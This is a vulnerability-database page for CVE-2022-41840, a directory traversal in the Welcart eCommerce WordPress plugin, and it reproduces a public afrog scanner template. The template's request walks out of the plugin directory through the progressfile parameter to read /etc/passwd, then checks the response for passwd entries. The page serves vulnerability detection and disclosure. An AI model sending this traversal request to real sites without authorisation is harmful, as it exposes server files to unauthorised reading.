CVE-2022-41840: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal

日期: 2025-09-01 | 影响软件: Welcart eCommerce | POC: 已公开

漏洞描述

Unauth. Directory Traversal vulnerability in Welcart eCommerce plugin <= 2.7.7 on WordPress.

PoC代码[已公开]

id: CVE-2022-41840

info:
  name: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal
  author: theamanrawat
  severity: critical
  verified: true
  description: |
    Unauth. Directory Traversal vulnerability in Welcart eCommerce plugin <= 2.7.7 on WordPress.
  reference:
    - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability
    - https://wordpress.org/plugins/usc-e-shop/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840
    - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve

rules:
  r0:
    request:
      method: GET
      path: /wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd
    expression: response.status == 200 && response.headers["content-type"].contains("application/json") && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-41840.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2022-41840: Welcart eCommerce <=2.7.7 - Local File Inclusion POC

Welcart eCommerce <= 2.7.7文件包含(CVE-2022-41840) 无POC

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446） 无POC

CVE-2022-0342: Zyxel authentication bypass patch analysis POC

CVE-2022-0434: WordPress Page Views Count <2.4.15 - SQL Injection POC

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446）无POC